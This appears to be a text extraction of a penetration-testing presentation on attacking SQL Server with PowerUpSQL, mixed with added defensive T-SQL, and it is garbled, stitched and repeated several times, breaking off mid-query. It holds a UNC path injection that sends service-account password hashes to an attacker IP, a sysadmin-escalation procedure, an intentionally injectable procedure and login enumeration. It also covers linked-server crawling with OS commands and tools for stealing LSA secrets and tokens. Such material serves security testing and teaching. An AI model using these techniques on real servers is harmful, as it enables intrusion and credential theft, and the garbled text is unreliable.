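        SET @sum = @sum + @d;
        SET @double = CASE WHEN @double = 1 THEN 0 ELSE 1 END;
        SET @pos = @pos - 1;
    END;
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END;
GO

-- Step 1: keyword search over column names. Extend the list to match local
-- naming conventions.
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, DATA_TYPE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE COLUMN_NAME LIKE '%card%'
   OR COLUMN_NAME LIKE '%ccn%'
   OR COLUMN_NAME LIKE '%pan%'
   OR COLUMN_NAME LIKE '%acct%';

-- Step 2: run the Luhn check over sampled values from those columns.
-- Constructed sample: 4111 1111 1111 1111 is the well-known test PAN
-- (Luhn-valid), the second value differs in its last digit, the third is an
-- order reference that merely has a card-like digit count.
DECLARE @sample TABLE (table_name sysname, column_name sysname, sample_value varchar(64));
INSERT INTO @sample VALUES
    ('Orders', 'CardNumber', '4111-1111-1111-1111'),
    ('Orders', 'CardNumber', '4111111111111112'),
    ('Orders', 'OrderRef',   '2016010412345');

SELECT table_name, column_name, sample_value,
       dbo.fn_luhn_valid(sample_value) AS luhn_valid   -- 1, 0, 0
FROM @sample;
-- A column whose samples are mostly luhn_valid = 1 is a strong candidate for
-- holding real card data and belongs on the encryption/tokenisation list.
```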
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser', 'sysadmin'
GO

SYSADMIN is often the OWNER
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user

Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution

Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
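The signed-procedure steps listed above, written out as T-SQL. This is an added example, not code from the deck or from PowerUpSQL; the database, user, procedure, certificate and login names and the backup file path are placeholders.

```sql
-- Added example, not from the original deck. All object names and the file path
-- are placeholders. Assumes MyAppDb exists and MyAppUser is already a database user.
USE MyAppDb;
GO
-- Step 1: the stored procedure. No WITH EXECUTE AS OWNER: callers keep their own
-- identity and gain only the rights carried by the signature added below.
CREATE PROCEDURE dbo.usp_ListDatabases
AS
BEGIN
    SET NOCOUNT ON;
    SELECT name, state_desc FROM master.sys.databases;
END;
GO
-- Step 2: a database master key, which protects the certificate's private key.
IF NOT EXISTS (SELECT 1 FROM sys.symmetric_keys WHERE name = N'##MS_DatabaseMasterKey##')
    CREATE MASTER KEY ENCRYPTION BY PASSWORD = N'<strong-random-password-placeholder>';
GO
-- Step 3: a certificate used only for signing code.
CREATE CERTIFICATE ProcSigningCert WITH SUBJECT = 'Signs dbo.usp_ListDatabases';
GO
-- Step 4: sign the procedure. Any later ALTER of the procedure body drops the
-- signature, so a DB_OWNER who edits the code does not inherit the rights below;
-- this is what the EXECUTE AS OWNER version on the previous slide cannot offer.
ADD SIGNATURE TO dbo.usp_ListDatabases BY CERTIFICATE ProcSigningCert;
GO
-- Step 5: copy the public part of the certificate to master and create a login
-- from it. Certificate-mapped logins cannot connect; they only hold permissions.
BACKUP CERTIFICATE ProcSigningCert TO FILE = 'C:\SQLKeys\ProcSigningCert.cer';  -- placeholder path
GO
USE master;
GO
CREATE CERTIFICATE ProcSigningCert FROM FILE = 'C:\SQLKeys\ProcSigningCert.cer';
CREATE LOGIN ProcSigningLogin FROM CERTIFICATE ProcSigningCert;
-- Step 6: grant that login exactly the server-level right the procedure needs,
-- instead of everything the database owner (often a sysadmin) can do.
GRANT VIEW ANY DATABASE TO ProcSigningLogin;
GO
-- Step 7: let the application user run the procedure. MyAppUser itself never
-- receives VIEW ANY DATABASE, IMPERSONATE or ownership rights.
USE MyAppDb;
GO
GRANT EXECUTE ON dbo.usp_ListDatabases TO MyAppUser;
GO
```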
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
    @DbName varchar(max)
AS
BEGIN
    Declare @query as varchar(max)
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
    EXECUTE(@query)
END
GO
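A hardened rewrite of sp_sqli2, added here as an example (not from the deck or from PowerUpSQL); the procedure name is a placeholder. The search term is bound as a parameter through sp_executesql, so it never becomes part of the query text.

```sql
-- Added example, not from the original deck: sp_sqli2 without the injection point.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname   -- sysname (nvarchar(128)) is as long as a database name can be,
                      -- so oversized varchar(max) input is rejected at the boundary
AS
BEGIN
    SET NOCOUNT ON;
    -- The query text is a constant. Only the VALUE of @pattern changes per call,
    -- and a quote inside it is data, never SQL.
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master.sys.databases '
      + N'WHERE name LIKE N''%'' + @pattern + N''%'' OR name = N''tempdb'';';
    EXEC sys.sp_executesql
         @stmt    = @query,
         @params  = N'@pattern sysname',
         @pattern = @DbName;
    -- LIKE wildcards (% and _) in the input are still honoured; if that matters,
    -- escape them or compare with = instead of LIKE.
END;
GO
-- Both calls are safe. In the original sp_sqli2 the second input would close the
-- string literal; here it is just a pattern that matches no database name.
EXEC dbo.sp_sqli2_fixed @DbName = N'MyApp';
EXEC dbo.sp_sqli2_fixed @DbName = N'O''Reilly';
```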
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?

1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them

One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Network zones: Internet, DMZ, Intranet. Hosts: LRA, HVA and LVA application servers and ADS; ports 80 and 443 open into the DMZ, ports 1433 and 1434 into the intranet. Key: HVA = High Value Application, LVA = Low Value Application.
1. Captain Evil ("PURE EVIL") reaches the LVA through SQL injection
2. Executes a local command via xp_cmdshell
3. Executes commands and gathers data from other database servers via osql, gaining access to the HVA with the shared domain service account]
Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?

SQL Server links are basically persistent database connections for SQL Servers.

Why should I care?
Short answer = privilege escalation

• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2], 'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Diagram: Leveraging MS SQL Database links. Network zones: Internet, DMZ, Intranet. Hosts: LRA, HVA and LVA application servers, ADS, and database server DB1 behind the LVA; ports 80 and 443 open into the DMZ, ports 1433 and 1434 into the intranet. Key: HVA = High Value Application, LVA = Low Value Application.
1. Captain Evil ("PURE EVIL") reaches the LVA through SQL injection
2. Executes SQL queries and local commands on the database servers via nested linked servers: the first DB link is configured with least privileges, the next DB link with the SA account]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats

Database links exist (and can be crawled) in about 50% of environments we've seen.
The max number of hops we've seen is 12.
The max number of servers crawled is 226.
Escalating Privileges: Crawling Server Links

Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler

New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql

Function               | Description
Get-SQLServerLink      | Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl | Crawls linked servers and supports SQL query and OS command execution
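The defender's side of the link problem: an audit query, added here as an example (not from the deck or from PowerUpSQL), that lists each linked server, how local logins are mapped on the remote side, and whether RPC OUT is enabled. The severity labels are this example's own.

```sql
-- Added example, not from the original deck. Run on each SQL Server instance.
-- A link whose catch-all mapping (local_principal_id = 0) lands on a fixed
-- remote login such as sa turns every local login, public included, into that
-- remote login on the other server; RPC OUT additionally allows remote procedures.
SELECT
    s.name                                   AS link_name,
    s.data_source                            AS remote_instance,
    s.product,
    s.is_rpc_out_enabled,                    -- 1 = EXEC ... AT [link] allowed
    s.is_data_access_enabled,                -- 1 = OPENQUERY / four-part names allowed
    CASE WHEN ll.local_principal_id = 0
         THEN N'<all other logins>'          -- the catch-all mapping
         ELSE sp.name
    END                                      AS local_login,
    CASE WHEN ll.uses_self_credential = 1
         THEN N'<caller''s own credential>'  -- pass-through, no escalation
         ELSE ll.remote_name
    END                                      AS remote_login,
    CASE
        WHEN ll.uses_self_credential = 1
            THEN N'INFO: pass-through credentials'
        WHEN ll.remote_name IS NULL
            THEN N'INFO: no login mapped, connection is refused'
        WHEN ll.remote_name = N'sa'
            THEN N'HIGH: callers become sa on the remote server'
        WHEN ll.local_principal_id = 0
            THEN N'MEDIUM: all local logins share one fixed remote login'
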